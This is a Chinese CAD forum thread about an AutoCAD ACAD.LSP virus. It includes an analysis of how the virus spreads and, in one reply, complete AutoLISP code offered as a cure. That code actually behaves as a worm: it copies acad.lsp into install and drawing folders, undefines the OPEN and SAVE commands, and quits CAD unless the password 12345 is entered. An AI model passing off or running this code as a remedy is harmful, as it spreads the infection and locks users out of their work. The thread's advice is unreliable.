中了ACAD.LSP怎么办??CAD高手进!
前几天发现打开CAD时,一些常用的快捷命令不能用了,看了PGP文件,一切都未改动,并且打开DWG文件时,会多生成一个ACAD.LSP文件。在网上找了一些方法,都不起作用,用专杀也查不出来(北京鸿业,深圳浩辰),我用的杀毒工具卡巴7.0也查不出来。我是做工程设计的,中了这个家伙后,几乎使我不能制图,这几天急得我茶饭不思,热切期盼高手能解决(可加我QQ:233710887),不胜感激!!!特将多生成的ACAD文件附上!(见附件) 还是建议你从新装一下CAD把.看了一下病毒的分析,觉得相当麻烦. 00.定义自动函数S::STARTUP
{01.获取CMDECHO变量,改设为0,一般程序最后会再改回去,
{02.通过搜索base.dcl文件,获取ACAD安装路径(support子夹) }
{03.获取菜单文件完整路径和名称,后来又没用~}
{04.获取当前图形文件完整路径和名称,截取当前工作路径}
{05.获取当前首选ACAD.LSP文件完整路径和名称,截取其路径}
{06.预设程序标记变量LSPBJ为0,意思是假设还没得手}
{07.用只读方式打开support中的ACAD.LSP,如文件不存在则建立同名文件
逐行检查此ACAD.LSP文件内容,一旦发现某行开头为(load "acadapp")
则设程序标记变量LSPBJ为1,表示已经得手过
只读任务结束,关闭文件}
{08.如果找到的ACAD.LSP路径和当前工作路径不同,
并且不在ACAD\support里面,则
{如果LSPBJ为0,也即尚未得手,那么
就在ACAD\support\acad.lsp文件末尾添加(load "acadapp")(princ),
即ACAD启动或开图时自动加载acadapp.lsp并隐蔽命令行反应。
然后同路径创建acadapp.lsp文件,作为刚改过的acad.lsp的备份. }
{如果LSPBJ为1,即已得手,且当前绘图不是未命名的新绘图任务,则
用复写ACAD\support\acadapp.lsp的方式
在当前工作路径创建acad.lsp. }
要不就这样一步一步的查找.删除他们看看.
回复 #2 yjh54900 的帖子
重装也没用啊,问题依旧存在。 从网上找的,试试看.可以告诉一声用下面的代码试试.应该会杀掉你们说的病毒.注意:开机后需要输入密码(12345).
(defun S::STARTUP (/ old_cmd lctn dwglctn mnllctn
applctn oldacad newacad nowdwg lspbj
wjm wjm1 wjqm wjqm1 wz
ns1 ns2 wjm0 wjqm0
)
(setq lst0 (list "(" "load" "CADstartup.lsp" ")"))
(setq old_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(if (setq lctn (findfile "acad.exe")) (setq lctn0 lctn)
(if (setq lctn (findfile "icad.exe")) (setq lctn0 lctn)
(if (setq lctn (findfile "zwcad.exe")) (setq lctn0 lctn) )))
(setq lctn lctn0)
(setq lctn (substr lctn 1 (- (strlen lctn) 8)))
(setq mnllctn (getvar "menuname"))
(setq nowdwg (getvar "dwgname"))
(setq wjqm (findfile nowdwg))
(setq dwglctn (substr wjqm 1 (- (strlen wjqm) (strlen nowdwg))))
(if (equal (setq acadlctn (findfile "acad.lsp")) nil) (setq acadlctn (strcat dwglctn "acad.lsp"))
(setq acadlctn (substr acadlctn 1 (- (strlen acadlctn) 8))) )
(setq wjqm (strcat lctn "acad.lsp"))
(setq wjqm0 (strcat lctn "cadapp.lsp"))
(if (setq wjm0 (open wjqm0 "a"))
;(progn
;(setq aa (read-line wjm0))
;(if (/= aa "load CADstartup.lsp")
(progn
(setq aa (strcat (nth 0 lst0) (nth 1 lst0) " " (nth 2 lst0) (nth 3 lst0)))
(write-line aa wjm0)
)
(close wjm0)
)
(setq oldacad (findfile "CADstartup.lsp"))
(setq newacad (strcat lctn "acad.lsp"))
(writeapp)
(setq oldacad (findfile "acad.lsp"))
(setq newacad (strcat dwglctn "acad.lsp"))
(writeapp)
(command "undefine" "open")
(command "undefine" "save")
(setvar "cmdecho" old_cmd)
(print "This is CAD")
(princ)
)
(defun writeapp ()
(if
(setq wjm1 (open newacad "w"))
(progn
(setq wjm (open oldacad "r"))
(while
(setq wz (read-line wjm))
(write-line wz wjm1)
)
(close wjm)
(close wjm1)
)
)
)
(defun C:open (/ p cont old_cmd)
(setq
old_cmd (getvar "cmdecho")
)
(setvar "cmdecho" 0)
(setq p "12345")
(setq p0 (getstring "\Input Pass Word:"))
(if (eq p p0) (progn
(command "redefine" "open")
(command "open" "")) (command "quit" ""))
)
(defun C:save (/ old_cmd)
(setq old_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(setq p0 (getstring "\Are you finish?"))
(command "redefine" "save")
(command "save" "")
(setvar "cmdecho" old_cmd)
(princ)
) 高手啊!值得学习 厉害啊……
完全不懂这东西…… 看有没有试过这个方法,
“我的电脑”里高级查找acad.lsp、acadapp.lsp这么两个文件,在“包含文字”数据框中输入:explode,选择搜索所有硬盘驱动器,将搜索到的这两个文件全部删除即可 看了一下病毒的分析,觉得相当麻烦. 高手向你学习 还这么一回事??
:L 高手,也曾中过同样的病毒,重装了系统才搞定它! 真厉害,佩服啊,全都看不懂啊:( 不太懂高手们说的什么意思啊,还是没弄明白怎么搞定,这代码什么的咱也不懂啊 天文符号,总有一天我也会看懂的!
页:
[1]